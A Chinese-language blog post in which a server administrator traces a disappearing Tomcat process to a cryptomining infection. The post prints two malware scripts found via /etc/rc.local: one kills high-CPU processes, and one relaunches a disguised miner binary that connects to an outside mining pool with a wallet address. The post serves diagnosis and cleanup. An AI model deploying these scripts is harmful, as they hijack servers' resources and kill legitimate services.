最近启动tomcat,还在启动过程中无缘无故tomcat进程就消失了,怎么找都找不到原因,tomcat日志和系统日志都没有任何显示,问了牛人后说被kill掉是不会有任何日志的,初步怀疑是中毒了。最后百度了一下,说病毒通常都会随系统的启动而启动,运行crontab -l没有发现,最后在/etc/rc.local发现启动了两个奇怪的脚本,/boot/efi/killer.sh和/boot/efi/daemon.sh,
killer.sh如下:
#!/bin/bash
#
killer.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
ps axf -o "pid %cpu command" |grep -v bashd| awk ‘{if($2>=80.0) print $1}‘ | while read procid
do
kill -9 $procid
done
sleep 3
done
killer.sh会kill掉cpu使用率超过80%的进程,tomcat启动过程极大可能超过80%而被kill掉
daemon.sh如下:
#!/bin/bash # daemon.sh export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin while true; do server=`ps aux | grep bashd | grep -v grep` if [ ! "$server" ]; then \cp -rf /boot/grub/ grub.tz /usr/sbin/bashd chmod +x /usr/sbin/bashd nohup bashd -a cryptonight -o stratum+tcp:// get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x & fi sleep 15 done
查找了get.bi-chi.com:3333这个域名,似乎跟挖矿有关。。。
最后处理方法是删除了这两个文件,然后查找这两个脚本的进程,kill掉,问题似乎解决了。
先凑合着这么解决了,等过几天再把系统重装了,奇怪的事,防火墙平时都是开启的,不知道什么时候就被人攻陷了。
时间: 2024-11-06 22:24:49